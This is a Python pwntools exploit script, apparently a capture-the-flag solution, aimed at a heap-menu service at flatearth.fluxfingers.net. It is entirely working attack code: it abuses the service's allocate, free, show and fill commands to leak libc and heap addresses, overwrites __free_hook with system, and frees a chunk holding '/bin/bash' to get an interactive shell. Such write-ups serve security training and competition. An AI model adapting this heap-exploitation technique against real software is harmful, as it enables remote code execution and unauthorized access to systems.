from pwn import * context(arch='amd64', word_size=64, os='linux', timeout=0.25) class R(remote): def encode_number(self,n): val=bin(n&0xffffFFFFffffFFFF)[2:].replace('0','wa').replace('1','wi') return val.ljust(128,'X') def cmd(self,cmd): self.recvuntil('NOM-NOM\n') self.send(cmd.ljust(8,"\n")) def alloc(self,n): self.cmd('whaa!') v = self.encode_number(n) self.recvuntil('darling...\n') self.send(v + "\n") def show(self,n): self.cmd('mommy?') v = self.encode_number(n) self.send(v + "\n") self.recvuntil('darling: ') return self.recvuntil("\n") def fill(self,off,data): self.cmd('') self.recvuntil('doing?\n') v =self.encode_number(off) self.send(v + "\n") self.recvuntil('darling!\n') self.send(data) def free(self,off): self.cmd('NOM-NOM') v =self.encode_number(off) self.send(v + "\n" ) r = R('flatearth.fluxfingers.net',1743) #r = R('localhost',1234) r.recvuntil('(_(___)_|\n') r.alloc(0x30) r.alloc(0x30) r.alloc(0x30) r.alloc(0x200) r.alloc(0x30) r.free(0x20+ (0x30+0x10)*3) main_arena = u64(r.show(0x20+(0x30+0x10)*3)[:-1].ljust(8,"\x00")) - 0x58 r.free(0x20+0x30+0x10) r.free(0x20+(0x30+0x10)*2) #print hex(libc) free_fastbin_off = 0x20+(0x30+0x10)*2 heap = u64(r.show(free_fastbin_off)[:-1].ljust(8,"\x00")) - 0x60 free_hook = main_arena + 0x1c88 system = main_arena - 0x37f790 r.fill(0x20,'/bin/bash\n') print hex(main_arena),hex(free_hook),hex(heap) raw_input('e') r.fill(free_hook-heap-0x10,p64(system) + "\n") r.free(0x20) r.interactive()